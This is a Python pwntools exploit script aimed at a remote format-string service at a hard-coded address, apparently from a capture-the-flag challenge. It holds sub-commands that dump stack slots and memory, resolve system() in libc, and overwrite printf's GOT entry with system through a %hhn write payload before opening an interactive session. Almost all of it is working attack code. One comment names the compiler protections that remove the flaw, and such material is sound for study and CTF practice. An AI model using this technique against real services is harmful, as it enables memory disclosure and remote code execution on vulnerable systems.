#!/usr/bin/python
import binascii
import pwn
import sys
import struct
# Target of the original write-up, hard-coded; every sub-command in main
# connects here.
RHOST, RPORT = "78.46.224.86", 1337

# Socket shared with leakFour() and send_payload(), which pwntools invokes as
# callbacks without a socket argument.  Set by the "dynelf" and "exploit"
# branches of main.
saveSocket = None
def leakStringAt(s, address):
    """Read the NUL-terminated string at ``address`` through the remote format string.

    Sends ``%7$s`` followed by the packed address so the remote ``printf``
    prints the bytes at ``address`` (positional offset 7 matches the
    ``offset=7`` ``main`` gives ``pwn.FmtStr``), then splits the reply on the
    ``AAAA`` marker and returns the part before it.

    Returns ``""`` without sending when the packed address contains a newline
    (``sendline`` could not deliver it intact), ``None`` when the connection
    closed while reading, otherwise the leaked bytes (possibly empty).  An
    ``EOFError`` raised by the send is re-raised to the caller.

    Note: the reply is read from the module-level ``p`` set in ``main``, not
    from ``s``; both name the same socket at every call site in this file.
    """
    probe = "%7$pBBBB" + pwn.p64(address)
    if "\n" in probe:
        print(" [!] newline in payload!")
        return ""
    try:
        s.sendline("%7$sAAAA" + pwn.p64(address))
    except EOFError:
        raise EOFError
    try:
        reply = p.recv()
        leaked_len = len(reply.split("AAAA")[0])
        print(" [R] leaked %d bytes at %x" % (leaked_len, address))
    except EOFError:
        print(" [X] EOFError trying to leak from %x" % address)
        return None
    # Exactly one marker is expected; anything else raises ValueError here.
    leaked, _trailer = reply.split("AAAA")
    return leaked
def leakFour(address):
    """Leak callback for ``pwn.DynELF``: return the 4 bytes at ``address`` as ``str``.

    Reads through the module-level ``saveSocket`` (set in ``main``) via
    ``leakBlock`` and prints the hex of the slice.  Any failure yields ``''``;
    the ``except`` is bare, so this also swallows ``KeyboardInterrupt`` and
    ``SystemExit``.
    """
    global saveSocket
    try:
        chunk = leakBlock(saveSocket, address, 4)[0:4]
        print(binascii.hexlify(chunk))
        return str(chunk)
    except:  # bare on purpose in the original: every error becomes ''
        return ''
def leakStack(s, start, end):
    """Dump positional stack slots ``start``..``end-1`` of the remote format string.

    Sends a single payload made of ``%<i>$p`` specifiers and prints the raw
    reply; nothing is returned.
    """
    specifiers = ["%%%d$p" % slot for slot in range(start, end)]
    s.sendline("".join(specifiers))
    print(s.recv())
def leakStackPivot(s):
    """Probe positional offsets 1..999 for the one that refers to our buffer.

    For each offset sends ``AAAA%4n%<i>$p`` and prints the reply, flagging
    any reply that contains ``0004`` as a candidate.  Replies are read from
    the module-level ``p`` (set in ``main``), not from ``s``.
    """
    for offset in range(1, 1000):
        s.sendline("AAAA%%4n%%%d$p" % offset)
        reply = p.recv()
        if "0004" in reply:
            print(" [!] MAYBE FOUND! offset %d : %s" % (offset, reply))
        else:
            print(" [+] offset %d : %s" % (offset, reply))
def leakBlock(s, address, size):
    """Leak ``size`` bytes starting at ``address`` and return them as a ``bytearray``.

    Calls ``leakStringAt`` repeatedly.  Each leaked chunk stops at a NUL on
    the remote side, so a ``0`` byte is appended after it and the cursor
    advances by ``len(chunk) + 1``.  A ``None`` chunk (read error) skips one
    byte without recording anything; an ``EOFError`` from the send ends the
    leak early and returns what was collected so far.  The result is not
    truncated, so it can be longer than ``size`` when the final chunk runs
    past the requested end.
    """
    collected = bytearray()
    remaining = size
    while remaining > 0:
        cursor = address + size - remaining
        try:
            chunk = leakStringAt(s, cursor)
        except EOFError:
            return collected
        if chunk is None:
            remaining -= 1
            continue
        collected += bytearray(chunk)
        collected.append(0)
        remaining -= len(chunk) + 1
    return collected
def send_payload(payload):
    """``execute_fmt`` callback for ``pwn.FmtStr``: send one payload and return the reply.

    Prefixes ``AAAA``, writes the line to the module-level ``saveSocket``,
    prints the repr of what was sent and what came back, and returns the raw
    reply.
    """
    framed = "AAAA" + payload
    print(repr(framed))
    saveSocket.sendline(framed)
    reply = saveSocket.recv()
    print(repr(reply))
    return reply
def leakSystem(s):
    """Resolve ``system`` in the remote libc with ``pwn.DynELF`` and return its address.

    ``s`` is unused: DynELF drives ``leakFour``, which reads the module-level
    ``saveSocket``.  ``0x400400`` is the starting pointer handed to DynELF —
    hard-coded for this target, presumably an address inside the (non-PIE)
    binary.
    """
    resolver = pwn.DynELF(leakFour, 0x400400)
    system_addr = resolver.lookup('system', 'libc')
    print("SYSTEM at 0x%x" % system_addr)
    return system_addr
def pad255(string):
    """Right-pad ``string`` with ``"A"`` to exactly 256 characters.

    Despite the name the target length is 256.  Strings of 256 characters or
    more come back unchanged: the repeat count is zero or negative, which
    produces an empty pad.
    """
    pad_len = 256 - len(string)
    return string + "A" * pad_len
def convertToMagic(address):
    """Build a ``%c``/``%hhn`` format string that writes ``address`` one byte at a time.

    ``address`` is packed little-endian into 8 bytes; byte ``i`` is written
    through positional argument ``38 + i`` (presumably the pointer table
    ``GOT_ADDR_BLOCK`` that ``main`` appends after the padded payload — the
    offset is hard-coded for this target).  ``totalDataWritten`` is the
    script's running count of emitted characters modulo 256, used to size
    each ``%<k>c`` pad.

    Branches, as written: a byte below the running count pads by
    ``256 - count + byte`` and then restarts the counter from that pad
    length; a zero byte emits nothing; a byte equal to the running count
    emits only ``%<arg>$hhn``; otherwise it pads by ``byte - count``.
    The finished string is printed and returned.
    """
    data = struct.pack("<q",address)
    totalDataWritten = 0
    out = ""
    for i in range(0,len(data)):
        newvalue = ord(data[i])
        if newvalue < totalDataWritten:
            # Wrap-around case: the counter is reset to 0 below and then
            # advanced by the pad length (newvalue after reassignment).
            newvalue = 256 - totalDataWritten + newvalue
            out += "%" + str(newvalue) + "c" + "%" + str(38 + i) + "$hhn"
            totalDataWritten = 0
        elif newvalue == 0:
            pass  # no write is emitted for a zero byte; the slot is left as-is
        elif newvalue == totalDataWritten:
            out += "%" + str(38 + i) + "$hhn"
            newvalue = 0  # nothing printed, so the counter must not advance
        else:
            out += "%" + str(newvalue - totalDataWritten) + "c" + "%" + str(38 + i) + "$hhn"
        totalDataWritten += newvalue
        totalDataWritten %= 256
    print out
    return out
if __name__ == "__main__":
    # Sub-commands (every one connects to the hard-coded RHOST:RPORT):
    #   leakstack <start> <end>  dump positional stack slots via %p
    #   pivot                    search for the positional offset of the input buffer
    #   dynelf                   resolve system() through pwn.DynELF (slow path)
    #   exploit                  leak the slot at 0x601018, derive system() from a
    #                            fixed libc delta, overwrite the slot with a %hhn
    #                            payload and go interactive
    #   leak <addr> <size>       dump memory to <addr>.elf and disassemble it
    # The whole chain exists because the service passes user input to printf as
    # the format argument; building with -Wformat-security (and FORTIFY_SOURCE,
    # which rejects %n in a writable format string) removes the primitive.
    if len(sys.argv) == 4 and sys.argv[1] == "leakstack":
        p = pwn.remote(RHOST,RPORT)
        leakStack(p,int(sys.argv[2],0),int(sys.argv[3],0))
        p.close()
        sys.exit(0)
    elif len(sys.argv) == 2 and sys.argv[1] == "pivot":
        p = pwn.remote(RHOST,RPORT)
        leakStackPivot(p)
        p.close()
        sys.exit(0)
    elif len(sys.argv) == 2 and sys.argv[1] == "dynelf":
        p = pwn.remote(RHOST,RPORT)
        saveSocket = p  # leakFour() reads this global when DynELF calls back
        data = leakBlock(p,0x00601018,8)  # slot the script treats as printf's GOT entry (non-PIE, hard-coded)
        d = leakSystem(p)
        print "PRINTF at : " + binascii.hexlify(data)
        # PRINTF ACTUAL: 7f44671dd550
        # SYSTEM ACTUAL: 7f44671cc6d0
        # DIFF: 10e80
        p.close()
        sys.exit(0)
    elif len(sys.argv) == 2 and sys.argv[1] == "exploit": # this is the right way to do it
        p = pwn.remote(RHOST,RPORT)
        data = leakBlock(p,0x601018,8)
        # leakBlock does not truncate: if the leaked chunk overran 8 bytes this
        # unpack raises struct.error.  The result is a 1-tuple; the %-format
        # below consumes it as the argument tuple.
        printf_addr = struct.unpack("<q",data)
        print " PRINTF AT 0x%x" % printf_addr
        system_addr = printf_addr[0] - 0x10e80  # delta measured in the dynelf run (see DIFF above)
        print " SYSTEM AT 0x%x" % system_addr
        print " [!!!] stage 1 complete. try to write 0x%x to 0x601018" % system_addr
        pwn.context.clear(arch='amd64')
        saveSocket = p  # send_payload() uses this global
        f = pwn.FmtStr(execute_fmt=send_payload,offset=7)  # constructed but unused; the writes below are commented out
        fmt_payload = pwn.fmtstr_payload(38, {0x601018: system_addr})
        fmt_new = "%".join(fmt_payload.split("%")[1:])  # drop everything before the first '%'
        print " [!] autogen payload = " + fmt_new
        # f.write(0x601018,system_addr)
        # f.execute_writes()
        # Eight little-endian pointers 0x601018..0x60101f, one per %hhn slot,
        # appended after the 256-byte padded format string.
        GOT_ADDR_BLOCK = "\x18\x10\x60\x00\x00\x00\x00\x00\x19\x10\x60\x00\x00\x00\x00\x00\x1a\x10\x60\x00\x00\x00\x00\x00\x1b\x10\x60\x00\x00\x00\x00\x00\x1c\x10\x60\x00\x00\x00\x00\x00\x1d\x10\x60\x00\x00\x00\x00\x00\x1e\x10\x60\x00\x00\x00\x00\x00\x1f\x10\x60\x00\x00\x00\x00\x00"
        PAYLOAD_BLOCK = convertToMagic(system_addr)
        # Hybrid payload: the first "%<n>" token of the hand-built string,
        # followed by every token after the first 'c' of the pwntools one.
        payload_firsttoken = [PAYLOAD_BLOCK.split("c")[0]]
        autogen_tokens = fmt_new.split("c")[1:]
        newmagic = "c".join(payload_firsttoken + autogen_tokens)
        print newmagic
        print " [!!!] sending magic\n"
        p.sendline(pad255(newmagic) + GOT_ADDR_BLOCK)
        print p.recv()
        p.interactive()
        p.close()
        sys.exit(0)
    elif len(sys.argv) == 4 and sys.argv[1] == "leak":
        address = int(sys.argv[2],0)
        size = int(sys.argv[3],0)
        p = pwn.remote(RHOST,RPORT)
        data = leakBlock(p,address,size)
        # Not a with-block: the handle is left open if write() raises.
        f = open("%08x.elf" % address,"wb")
        f.write(data)
        f.close()
        # print binascii.hexlify(data)
        print pwn.disasm(data,arch='amd64',vma=address)
        p.close()
        sys.exit(0)
    else:
        print "what do you want?>"